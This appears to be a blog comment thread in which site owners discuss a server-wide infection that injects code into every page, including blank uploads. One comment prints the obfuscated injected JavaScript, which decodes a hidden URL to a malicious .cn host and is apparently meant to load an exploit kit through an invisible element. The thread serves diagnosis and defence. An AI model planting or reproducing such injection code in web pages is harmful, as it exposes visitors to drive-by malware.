I made a test yesterday, uploaded a blank file, say test.html. When I opened it via browser all I can see is the code above (it supposed to be blank). This is just too weird for me. Can you please let me know how to solve this issue exactly? I have already contacted my hosting provider including a link to this blog two days ago but but the code is still there. Thanks a lot in advance!

This must be only a part of the code, since the only thing it does is creates a new “hidden” style and prints “http ://ncccnnnc .cn/img/ index.php”

Anyway, this must be the same server-wide exploits and you should contact your hosting provider.

var MouCn = document;MouCn.writeln(eRRhK());function NZNrq(HYDjw){ var hOWsD = “”, kTPQQ = 0;for (kTPQQ=HYDjw.length-1;kTPQQ>=0;kTPQQ–){hOWsD += HYDjw.charAt(kTPQQ);} return hOWsD;}function eRRhK(){document.write(“.mOnjv{width:0%;height:0%;border:none;}”);var uyofy = “”;var yxZmn = uyofy.replace(/[\+$]/g, hDtWy(“.70.68.70.2e.78.65.64.6e.69.2f.67.6d.69.2f.6e.63.2e.63.6e.6e.6e.63.63.63.6e.2f.2f.3a.70.74.74.68″));return yxZmn;}function hDtWy(GszBw){GszBw = GszBw.replace(/[\.]/g, “%”);GszBw = unescape(GszBw);return NZNrq(GszBw);}

So it looks like ncccnnnc is not the only domain they use?

Do you have any information about how this exloit works?

It exists for about one week. All YES exploit kits query malwaredomainlist if its sites have already been listed on MDL.

I had a .jpeg signature picture hosted at my infected server that was linked to for use as a signature file on other .php forums. Should visitors to that other forum that viewed that signature worry?

ex:server A (infected server) xxxx.jpeg hosted on that server.

Server B (not infected) – URL link in signature file to the xxxx.jpeg on Server A

Are those that viewed the posts with the sig files, in danger?